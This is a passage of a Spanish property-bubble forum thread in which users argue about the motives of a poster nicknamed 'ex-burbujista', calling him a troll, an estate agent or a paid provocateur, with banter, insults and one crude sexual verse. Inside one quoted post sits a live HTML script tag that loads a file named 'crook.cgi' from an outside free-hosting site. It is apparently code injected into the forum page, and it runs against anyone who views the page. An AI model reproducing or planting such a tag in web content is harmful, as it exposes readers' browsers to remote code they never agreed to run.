Los motivos de ex-burbujista. ¿Sus intereses?

emfo

Madmaxista
Desde
21 Jun 2006
Mensajes
1.515
Reputación
3.353
.......................................
 
Última edición:

emfo

Madmaxista
Desde
21 Jun 2006
Mensajes
1.515
Reputación
3.353
.......................................
 
Última edición:

Mulder

Madmaxista
Desde
23 May 2006
Mensajes
13.776
Reputación
12.716
Lugar
Alicante
emfo dijo:
HOMBRE REFRANERO, lgtb O PELICULERO
En mi tierra hay un dicho que dice: "Home refraner, gos y mal faener" que traducido al castellano vendría a ser algo asi como: "Hombre refranero, mal trabajador y perro"
 

skeptik

Madmaxista
Desde
3 May 2007
Mensajes
3.390
Reputación
4.454
emfo dijo:
¿Que intereses tienes en esto ex-burbujista?
Miedo. Tiene miedo a que haya burbuja.

Si te has comprado una vivienda, no quieres que baje de precio. Necesitas convencer a los demás (y sobre todo convencerte a tí mismo) de que eso no va a suceder.

Algo así estamos haciendo nosotros tratando de diseminar por aquí información de lo absurdo que es ésto, un mensaje a cada noticia burbujista, etc.

Desde el Estado, los bancos, etc, están entre la espada y la pared. No pueden permitir que la burbuja estalle, pero se dan cuenta de que esto no puede subir indefinidametne. Así que nos hablan de aterrizaje suave. Que nadie tenga miedo, ni unos ni otros.

Y la verdad está ahí fuera. El precio de un piso me parece difícil de cuantificar. Un nuncabajista convencido creerá que su vivienda vale 50 y la anunciará así. Un burbujista estimará que sólo vale 20 y será lo que le ofrezca. Si no acercamos posiciones (sin contar los que vengan detrás, claro), no se venderá el piso.

Así que el precio real de venta dependerá de la oferta y la demanda, de la prisa por comprar y la prisa por vender, de si estamos dispuestos a comprar un piso sobrevalorado o a vender por debajo de su precio, si llegamos a un acuerdo cerramos un trato.

Incidentalmente, lo que menos importa en esta transacción es algo tan difuso como el valor real que tenga el piso.
 

autsaider

Madmaxista
Desde
1 May 2007
Mensajes
24.128
Reputación
37.303
emfo dijo:
¿Que intereses tienes en esto ex-burbujista?
Hay gente que le divierte trolear los foros. Se enganchan a ello y se pasan horas y horas muertas troleando. Por ejemplo hay gente que encuentra divertido entrar a un foro de animales de compañia y postear una receta de gato al horno. Pues ex-burbujista viene aquí a trolear. Y como le gusta, pues se pasa horas muertas troleando. Y no os extrañe que use proxys y tenga varias cuentas distintas desde las que trolear.
 

gañan

Madmaxista
Desde
26 Ago 2006
Mensajes
1.246
Reputación
2.098
Juas,juas,juas .Veo que sigues en plena forma Emfo.Como me he reido con tus refranes.Lo de ex-burbujista esta claro que es una defensa de sus intereses.No es un Tecnoguasero (dice que es funcionario),por tanto lo mas posible es que haya comprado no hace mucho y los tenga de corbata por lo que se avecina.Lo que dice del hacker me parece mas una payasada para huir del foro que otra cosa.
Añado un lindo verso del Dr. Tangalanga:

-Si Cristo murio en la cruz, con tres clavos solamente.Como no muere tu hermana que la clava tanta gente?
 

Facundo

Madmaxista
Desde
18 Ene 2007
Mensajes
950
Reputación
13
skeptik dijo:
Miedo. Tiene miedo a que haya burbuja.

Si te has comprado una vivienda, no quieres que baje de precio. Necesitas convencer a los demás (y sobre todo convencerte a tí mismo) de que eso no va a suceder.
Os explico quién es y la naturaleza de su problema.
 
Última edición:

Yakumo

Madmaxista
Desde
5 Ene 2007
Mensajes
403
Reputación
6
Facundo dijo:
Os explico quién es y la naturaleza de su problema.<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
El enlace de tu firma en el que va al foro de nuevos vecinos y aparece saida hablando me hace pensar que saida no es ex-burbujista.

No sé si es muy listo o simple, pero no creo que él escriba "abujero" tal cual porque sí.
 

BUMBUM

Madmaxista
Desde
4 Jul 2006
Mensajes
7.817
Reputación
9.376
Ex-burbujista es a burbuja.info lo que la tele-basura a la sociedad: nadie la ve, pero supera en audiencia a cualquier tipo de programa de mayor interés.
 

La gran explosion

Madmaxista
Desde
22 Nov 2006
Mensajes
55
Reputación
43
Ex brubujista debe tener una inmobiliaria o sera promotor inmobiliario. No se cual de las dos.
El caso es que en sus avatares ya han aparecido enlaces a varias obras en las que se venden pisos y mensajes incitando a que la gente los compre. Vamos, que se hace una buena publicidad gratuita, aunque este no sea el mejor lugar para intentar vender pisitos...
Un saludo!
 

>> 47 <<

Madmaxista
Desde
28 Ago 2006
Mensajes
24.356
Reputación
7.061
A veces el trolerío dosificado puede hacer una labor sacrificada y dificil nadando a contracorriente, necesaria para sembrar expectación y generar contrapuntos y contraargumentos que de otro modo no se generarían.

Lo que sobran son los insultos. No entiendo esa necesidad compulsiva de insultar a los interlocutores. Y ese jojojojo. Ese doncella ofendida cuando le dices que no hace falta insultar, ni caer en la personalización para argumentar ideas. Esa constante de abrir hilos y tratar de humillar a quien le sugiere que tal vez hay otros puntos de vista, repartiendo etiquetas de falta de inteligencia, cretinos, infantiles, etc, tampoco lo acabo de entender.
Si tuviese seguridad en lo que dice, no tendría ninguna necesidad de insultar. Pasaría olímpicamente. Diría allá vosotros sin ningun miedo. Y si estuviese tan convencido de lo que dice, y con tanta seguridad, tal vez no perdería tanto el tiempo en este foro y se dedicaría a debatir sobre otros temas en otros foros, porque en eso ya está todo dicho, y sin temor a que cambie. Por eso la pregunta de emfo, me podría parecer oportuna, aunque mejor en el area de la papelera o de relax.

Desde luego la voz discrepante con modales obliga a contraargumentar y esto es bueno para un foro, de lo contrario sería muy aburrido todos recitando lo mismo. El insulto y la humillación al discrepante denota miedo, y es algo que no entiendo.

Además la aportación de que el precio del suelo en el Africa no baja por más demanda que haya entre los jovenlandeses hambrientos, me parece una de las aportaciones más geniales, que invita a pensar que para hacer efectivo el acceso a techo, en una democracia seria, son indispensables medidas fiscales antiacaparación especulativa. El libre mercado no regula nada, cuando siempre magnifica contrastes en los que más tienen, y los que menos.

La vez que subió el hilo sobre la mani del 24-M animando el cotarro y señalando que aquí a veces parece que hay más especulatas que aspirantes a vivienda asequible, también parece digno de encomio, aunque lo podía haber hecho de otra manera más elegante.

Y desde luego la firma con la imagen de una casa y de una chica haciendo números con la inscripción: quieres una pero no de alquiler, no me negaréis que es un derroche de genialidad perversa e incendiaria, asquerosamente provocador. Desde luego la chica puede estar deseando una casa pero no de alquiler, pero lo perverso es que equipara en la imagen la casa y la chica a un mismo nivel, y equipara el alquilar casas con alquilar chicas, aunque él lo niegue diciendo que la primera acepción es la correcta, y los perversos son los demás. Sencillamente genial. Creo que contribuiría a dar nivel al foro, si no insultase ni humillase tanto a sus interlocutores, ni abriese tantos hilos sin sustancia.

La peli de Batman sería muy aburrida sin Joker.
La peli de Superman sería muy aburrida sin la criptonita.
La serie de los pitufos, sería muy aburrida sin Gargamel y el Boboazrael.
Alguien tiene que hacerlo. Si no existiese habría que inventarlo.


Creo que si corrigiese sus modales y su compulsión a degradar al discrepante, y dosificase más la elaboración de hilos innecesariamente provocadores, el conjunto resultante sería muchisimo mejor que sin él.

Ahora bien: si siguiese abriendo hilos diciendo iros a tomar pol trastero, y otras salidas de tono sin ton ni son, haciendo spam de lo más burdo, pues lo más correcto me parecería desenfundar el desprotonador de trolletes maleducaos, y darle jarabe de baneo de una semana como mínimo paver si se amansa un poco la fiera.

Hoy se va a sentir importante y se multiplicará su ego x 1000.

Un saludete cordial. :)
 
Última edición:

Crash

Madmaxista
Desde
25 Abr 2006
Mensajes
1.471
Reputación
166
Lugar
Barcelona
ex-burbujista dijo:
otro con la tipica bobada qu eno viene a cuento, ¿que no sabeis hablar de nada y sacais cosas sin venir a cuento?

ya se:
"España se hunde"
"esto es una hez"
"si yo no puedo comprar tendrán que bajar"
"mi mama me mima"

HASTA EL LUNES.
http://www.burbuja.info/inmobiliaria/showthread.php?t=30075&page=2&highlight=lunes

¡hez! ¿Ya es lunes? ¡Llego tarde colegio! (esto último hay que decirlo como Michael J. Fox en Regreso al Futuro I).

Jo tio, qué vigilancia... :p
 

superexpat

Madmaxista
Desde
15 Feb 2007
Mensajes
605
Reputación
218
Esta clarisimo

A mi me parece bastante evidente que ex-burbu esta compinchado con los admins para crear polemica y asi generar mas mensajes con su consiguiente impacto a la actividad (y por consecuencia: ingresos) del foro....

my 2 cents
 

TomCat

Madmaxista
Desde
14 Ago 2006
Mensajes
1.106
Reputación
98
ex-burbujista no se cree lo que dice, es evidentemente un mentiroso.

en mi opinión, la tonterías que pone por el foro son parte de su trabajo.

ex-burbujista está acojonado porque la burbuja ya ha explotado

Quien cree a ex-burbujista no es persona especialmente lista
 
Última edición:

TomCat

Madmaxista
Desde
14 Ago 2006
Mensajes
1.106
Reputación
98
Nadie se ofende (no ofende el que quiere sino el que puede), pero muchos (yo al menos) tenemos cierta curiosidad en saber por que dedicas tanto esfuerzo en repetir machaconamente un mensaje que ni tu te crees.